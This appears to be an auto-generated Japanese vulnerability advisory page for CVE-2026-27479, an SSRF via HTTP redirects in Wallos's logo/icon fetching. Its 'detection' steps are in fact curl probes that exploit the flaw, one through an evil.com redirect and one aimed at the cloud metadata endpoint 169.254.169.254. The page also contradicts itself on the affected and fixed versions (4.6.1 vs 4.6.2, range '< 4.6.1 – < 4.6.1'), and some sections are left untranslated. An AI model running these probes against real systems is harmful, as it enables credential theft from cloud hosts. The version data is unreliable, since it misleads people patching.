HIGHCVE-2026-27479CVSS 7.7

Wallos: ロゴ/アイコンURL取得におけるリダイレクトバイパスによるSSRF

Q: CVE-2026-27479 in Wallos Personal Subscription Trackerの影響はありますか？

はい、バージョン4.6.1以前のWallosを使用している場合、内部リソースへの不正アクセスや機密情報の漏洩のリスクがあります。

Q: CVE-2026-27479 in Wallos Personal Subscription Trackerを修正するにはどうすればよいですか？

Wallosをバージョン4.6.1にアップデートしてください。アップデートが困難な場合は、WAFによるHTTPリダイレクトのブロックなどの対策を講じてください。

Q: CVE-2026-27479は現在積極的に悪用されていますか？

現時点では具体的な悪用事例は確認されていませんが、SSRF脆弱性は悪用されやすいと考えられます。

Q: CVE-2026-27479に関するWallosの公式アドバイザリはどこで入手できますか？

Wallosの公式ウェブサイトまたはGitHubリポジトリでアドバイザリをご確認ください。

プラットフォーム

php

コンポーネント

wallos

修正版

4.6.2

AI Confidence: highNVDEPSS 0.0%レビュー済み: 2026年5月

NVDで見る

保存

CVE-2026-27479は、Wallos Personal Subscription Trackerのバージョン4.6.1以前に存在するServer-Side Request Forgery (SSRF)脆弱性です。この脆弱性は、ロゴ/アイコンのアップロード機能において、HTTPリダイレクトを許可することでIPアドレス検証を回避し、攻撃者が内部リソース、例えばクラウドインスタンスのメタデータエンドポイントにアクセスすることを可能にします。バージョン4.6.1で修正されており、早急なアップデートが必要です。

影響と攻撃シナリオ

このSSRF脆弱性を悪用されると、攻撃者はWallosサーバーから任意の内部リソースにアクセスできる可能性があります。例えば、クラウド環境でWallosがホストされている場合、メタデータエンドポイントから機密情報（APIキー、パスワードなど）を窃取することが考えられます。さらに、内部ネットワークにアクセスすることで、他のシステムへの攻撃の足がかりとして利用されるリスクも存在します。この脆弱性は、類似のSSRF攻撃と同様に、機密情報の漏洩や、ネットワーク全体の侵害につながる可能性があります。

悪用の状況

CVE-2026-27479は、2026年2月21日に公開されました。現時点では、この脆弱性を悪用した具体的な攻撃事例は確認されていませんが、SSRF脆弱性は一般的に悪用されやすいと考えられます。CISAのKEVカタログへの登録状況は不明です。公開されている情報に基づき、攻撃者による悪用が懸念されるため、迅速な対応が必要です。

リスク対象者翻訳中…

Organizations utilizing Wallos for subscription tracking, particularly those hosting the application on cloud platforms like AWS, Azure, or Google Cloud, are at risk. Shared hosting environments where Wallos is installed alongside other applications could also be vulnerable, as a compromise of one application could potentially lead to exploitation of this SSRF vulnerability.

検出手順翻訳中…

• php: Examine Wallos application logs for unusual outbound HTTP requests, particularly those involving redirects to internal IP addresses or cloud metadata endpoints.

grep 'redirect' /var/log/apache2/access.log | grep '169.254'

• generic web: Monitor access logs for requests to the logo upload endpoint with suspicious URL parameters.

curl -I 'http://your-wallos-instance/upload_logo.php?url=http://evil.com/redirect'

• generic web: Check response headers for signs of internal resource exposure.

curl -I 'http://your-wallos-instance/upload_logo.php?url=http://169.254.169.254/latest/meta-data/'

攻撃タイムライン

2026-02-21Disclosure
disclosure

脅威インテリジェンス

エクスプロイト状況

概念実証不明

CISA KEVNO

インターネット露出高

レポート2 件の脅威レポート

EPSS

0.03% (10% パーセンタイル)

CISA SSVC

悪用状況poc

自動化可能no

技術的影響

影響を受けるソフトウェア

コンポーネントwallos

ベンダーellite

影響範囲修正版

< 4.6.1 – < 4.6.14.6.2

弱点分類 (CWE)

CWE-918

タイムライン

予約済み2026-02-19
公開日2026-02-21
更新日2026-02-24
EPSS 更新日2026-03-23

緩和策と回避策

まず、Wallosをバージョン4.6.1にアップデートすることが最も効果的な対策です。アップデートが直ちに困難な場合は、WAF（Web Application Firewall）を導入し、外部からのリクエストにおけるHTTPリダイレクトをブロックするルールを設定することを検討してください。また、Wallosがホストされている環境のネットワークセグメンテーションを強化し、内部リソースへのアクセスを制限することも有効です。アップデート後、ログを監視し、不審なリクエストがないか確認することで、脆弱性の悪用を早期に検知できます。

修正方法

Wallosをバージョン4.6.1以降にアップデートしてください。このバージョンは、サブスクリプションおよび支払いのロゴとアイコンを取得する際にHTTPリダイレクトを正しく検証することでSSRFの脆弱性を修正しています。

CVEセキュリティニュースレター

脆弱性分析と重要アラートをメールでお届けします。

よくある質問

CVE-2026-27479 — SSRF in Wallos Personal Subscription Trackerとは何ですか？

CVE-2026-27479は、Wallos Personal Subscription Trackerのバージョン4.6.1以前に存在する、HTTPリダイレクトを悪用して内部リソースにアクセスできるSSRF脆弱性です。

CVE-2026-27479 in Wallos Personal Subscription Trackerの影響はありますか？